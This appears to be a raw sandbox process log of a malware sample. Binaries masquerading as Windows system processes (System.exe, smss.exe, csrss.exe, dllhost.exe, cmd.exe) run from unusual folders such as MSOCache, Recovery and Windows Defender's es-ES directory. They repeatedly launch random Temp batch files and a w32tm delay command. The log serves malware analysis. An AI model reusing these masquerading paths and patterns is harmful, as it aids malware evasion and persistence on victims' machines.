C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jhJpXqSaXt.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xc1v93Hoh1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ST975DOJvB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ljju5cbnZy.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Wqkq749RcZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Rn5V8mQYRH.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ay5NT8uJA6.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7etkz3INVn.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cOf3pucYXi.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SpZgFYZT4y.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q3ZRkRg4YZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TmtjCtAJTq.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GQn77QEoUi.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q2cXKRfm9B.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\18eSMsDQCm.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\taskeng.exe
taskeng.exe {9F4EE8F7-AC11-4DE4-B14F-8C27A906E828} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GrfoiSU1wP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2K3DLFE7WC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\64IFTJQeKo.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pkmftNZ3Wr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fg7ffKrc0I.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QOz0umrEhM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NczlPfxoCy.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fBgHK1Vy37.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wLA3izB53h.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AvSbArq942.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9dhy3B39XM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BikqvEHWfW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\evbbIz777a.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cYhs0sn2L6.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UMVEid32eq.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WqeaogqjWu.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eQ9EwglUAP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zi7wkUpBKE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xHU7fKnwSZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VG36Hwy0Lv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rd8mWnFnEV.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2tBWjDxv5U.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IrGY9odMle.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZcfpJnj91J.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9EVEWoB6gn.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LEBHQwxRW8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFeEewS5jL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gMBHdlpNUB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TZCyxGcg3L.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yMeEqlK1gO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kXH0MsH7jV.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N7XO3McAFn.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uq0hdwOOBc.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uugdhbmYnk.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Dk8ljd7jBY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\v65NgynF79.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\79RMekxjZd.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgKlNS7JdR.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\H7eFR6a9mI.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CWxqMEPA9M.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QOz0umrEhM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\15yWIDpGaf.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iPSx7mMsuZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\csrss.exe
C:\Users\Admin\csrss.exe
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zAqEIlSfAD.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Users\Admin\csrss.exe
"C:\Users\Admin\csrss.exe"
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3gUlVaPHfz.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZmgdUlucqh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ixgWq8OOYW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
